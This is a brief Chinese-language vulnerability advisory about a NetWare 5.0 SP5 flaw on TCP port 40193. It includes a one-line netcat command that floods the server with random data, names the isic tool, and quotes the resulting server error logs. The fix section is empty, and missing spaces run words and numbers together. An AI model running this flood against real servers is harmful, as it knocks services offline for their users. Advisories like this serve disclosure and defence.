NetWare5.0/SP5存在一个缓冲区溢出漏洞，如果攻击者通过一台linux的机器连接到同一网络并执行以下命令:
[root@tik/root]#cat/dev/urandom|nc192.168.1.1540193

利用isic同样可以获得相同的效果。

由于NetWareTCP端口40193没有正确的处理TCP碎片包，攻击者能在几分钟内让服务器出现内存分配错:

10-07-200012:29:53pm:SERVER-5.0-4631[nmID=1001C]
WARNING!ServerXXXXXexperiencedacriticalerror.Theoffending
processwassuspendedorrecovered.
However,serviceshostedbythisservermayhavebeenaffected.

连续攻击大约1小时左右，服务器出错并挂起。

10-07-200012:29:53pm:SERVER-5.0-4631[nmID=1001C]
WARNING!ServerXXXXXexperiencedacriticalerror.Theoffending
processwas
suspendedorrecovered.However,serviceshostedbythisservermay
havebeenaffected.

解决方法: